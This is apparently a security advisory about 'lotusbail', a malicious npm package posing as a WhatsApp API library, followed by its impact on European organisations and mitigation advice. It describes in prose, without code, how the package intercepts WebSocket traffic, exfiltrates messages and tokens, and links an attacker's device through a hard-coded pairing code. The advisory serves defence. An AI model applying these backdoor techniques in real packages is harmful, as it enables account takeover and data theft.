The threat involves a malicious npm package named "lotusbail" that impersonates a legitimate WhatsApp API library, leveraging the popularity of the @whiskeysockets/baileys TypeScript library to appear functional and trustworthy. Uploaded in May 2025 and downloaded over 56,000 times, the package acts as a fully operational WhatsApp API but covertly intercepts all WhatsApp messages, contacts, media files, and authentication tokens by wrapping the WebSocket client used for WhatsApp Web API communication. This interception allows the attacker to capture sensitive data in real-time and exfiltrate it in encrypted form to a server they control. Critically, the package includes a hard-coded pairing code that links the attacker's device to the victim's WhatsApp account during authentication, granting persistent, undetectable access to the victim’s conversations and contacts. This backdoor remains active even if the malicious package is uninstalled, as the attacker’s device remains linked until manually removed via WhatsApp settings. The malware also employs anti-debugging techniques, such as infinite loop traps, to hinder analysis and detection. This supply chain attack exploits developer trust in npm packages, bypassing traditional static analysis and reputation-based security controls because the package performs legitimate WhatsApp API functions alongside malicious activities. The attack vector targets developers who incorporate WhatsApp API functionality into applications, potentially compromising end users’ WhatsApp accounts and data. The incident underscores the growing threat of supply chain attacks in open source ecosystems, where malicious code can infiltrate widely used libraries and tools, evading conventional security measures.

For European organizations, the impact of this threat can be significant, especially for those relying on WhatsApp for business communications or integrating WhatsApp APIs into their applications. Confidentiality is severely compromised as attackers can access private messages, contact lists, media, and documents, leading to potential data breaches and privacy violations under GDPR. Integrity is affected since attackers can maintain persistent access to WhatsApp accounts, potentially manipulating communications or impersonating users. Availability might be indirectly impacted if attackers disrupt communications or cause account lockouts. The persistent backdoor enables long-term espionage or data exfiltration without detection. Organizations in sectors such as finance, legal, healthcare, and government, where WhatsApp is used for sensitive communications, face heightened risks. Additionally, developers and software supply chains in Europe are at risk of inadvertently distributing compromised applications. The attack also undermines trust in open source ecosystems, potentially causing reputational damage and operational disruptions. Given the package’s continued availability and active downloads, the threat remains current and relevant.

European organizations should implement a multi-layered mitigation strategy: 1) Enforce strict vetting and validation of all third-party npm packages, including verifying publisher authenticity and scanning for malicious behavior using advanced dynamic analysis tools beyond static code checks. 2) Monitor WhatsApp linked devices regularly and educate users on how to unlink unknown devices via WhatsApp settings to remove persistent backdoors. 3) Employ runtime application self-protection (RASP) and behavioral monitoring to detect anomalous WebSocket traffic or unauthorized data exfiltration. 4) Use dependency management tools that support supply chain security features such as provenance tracking, package signing, and vulnerability alerts. 5) Encourage developers to use official or well-vetted WhatsApp API libraries and avoid unverified packages. 6) Integrate threat intelligence feeds to stay updated on emerging supply chain threats and malicious packages. 7) Conduct regular security awareness training focused on supply chain risks and secure coding practices. 8) Collaborate with npm and other repository maintainers to report and expedite removal of malicious packages. 9) Implement network-level controls to detect and block suspicious outbound connections to attacker-controlled servers. 10) Consider adopting zero trust principles for internal communications and API integrations to limit lateral movement in case of compromise.